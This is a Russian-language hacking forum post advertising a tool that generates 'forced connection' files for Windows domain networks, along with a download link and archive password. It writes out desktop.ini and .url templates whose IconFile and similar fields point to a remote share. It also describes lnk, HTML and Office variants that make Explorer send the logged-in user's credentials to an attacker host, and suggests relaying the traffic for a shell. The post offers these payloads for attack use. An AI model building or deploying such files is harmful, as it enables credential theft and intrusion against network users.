Force Connections - Генерация полезной нагрузки сети v1.0


HMCoba

Активный пользователь
Активный
Регистрация
22.04.2023
Сообщения
157
Репутация
114
Взлом - это не всегда взлом систем с уязвимостями удаленного выполнения. На этот раз мы собираемся использовать другой подход.
Представьте, что вы подключены к доменной сети и каким-то образом можете доставлять файлы в сеть, например, записывать файлы на активно используемый файловый сервер, отправлять документы по электронной почте пользователям сети или выполнять MITM-атаки против HTTP-трафика. Если вы можете это сделать, то вам нужен только способ заставить сетевые компьютеры подключаться к хосту по вашему выбору.​
Генерация полезной нагрузки нашей сети предоставляет новые способы, которые вы можете использовать для атаки на эти сети, поскольку он может развертывать несколько видов контента, который заставит удаленные компьютеры подключаться к назначенной цели и аутентифицировать себя от имени вошедшего в систему пользователя. На данный момент существует множество способов использовать эти системы, такие как сниффинг, выполнение или новый .​
1111.png
Наш инструмент генерации полезной нагрузки может генерировать и развертывать несколько файлов, таких как desktop.ini, файлы lnk, файлы URL, документы html/office со встроенными ссылками на удаленный ресурс. Эти встроенные ссылки автоматически обрабатываются проводником Microsoft, и отключить его невозможно.​
Подробности:​
Параметр -t указывает, какая полезная нагрузка будет использоваться. Примеры:​
* d1: Iconfile - desktop.ini: Параметр IconFile указывает на сетевой ресурс. Когда вы получаете доступ к папке файловой системы и этот файл desktop.ini хранится в подпапке, explorer.exe автоматически подключается к сети и отправляет учетные данные пользователя. * d2 :​
LocalizedResourceName - desktop.ini: LocalizedResourceName указывает на сетевой ресурс. Работает с папкой/подпапкой * d3: Информационная подсказка - desktop.ini: Информационная подсказка указывает на сетевой ресурс. Работает при выборе папки * d4: desktop.ini - desktop.ini : Desktop.ini указывает на сетевой ресурс. Работает при входе в папку​
* d0: Все - desktop.ini: Разверните все известные полезные нагрузки desktop.ini одновременно, чтобы убедиться, что удаленная цель задействована.​
[.ShellClassInfo]​
Информационная подсказка=Проверка концепции перенаправления рабочего стола -
desktop.ini=@\\host\admin$,-1​
Информационная подсказка=@\\host\admin$,-1​
LocalizedResourceName=@\\host\admin$,-1​
IconFile=\\host\admin$​
IconIndex=-666​
ConfirmFileOp=0​
* u: url-файл: разверните .url-файл, который работает в виде lnk-файла. Целевой IconFile= указывает на сетевую службу.​
[ПО УМОЛЧАНИЮ]​
BASEURL=
[InternetShortcut]​
URL=
Modified=203BF2701D7FC60120​
IconIndex=3​
IconFile=\\host\admin$​
* l: URL-адрес: разверните файл .lnk. Это пустой встроенный файл lnk, который содержит параметр CUSTOMICON (флаг и 128), указывающий на сетевую службу.​
* h: html-файл: разверните .html-файл со LINK REL="stylesheet" , указывающим на сетевую службу.​
* o: офисный файл: разверните файл .pps с HTML-кодом LINK REL="stylesheet" , указывающим на сетевую службу. Вы можете переименовать расширение файла в .doc,.ppt,.pps,.xls,..​
Параметр -p является необязательным и указывает на каталог, в котором будут сохранены полезные данные.​
Вы можете использовать этот инструмент для развертывания полезной нагрузки и атаки на сетевой канал, созданный инструментом . или воспроизведите SMB или HTTP-трафик на указанную цель, чтобы получить оболочку с помощью .​
Вы можете просматривать в Интернете .​
RAR-2.png
Скачать :
Пароль: 1111​
 
Последнее редактирование:
Верх Низ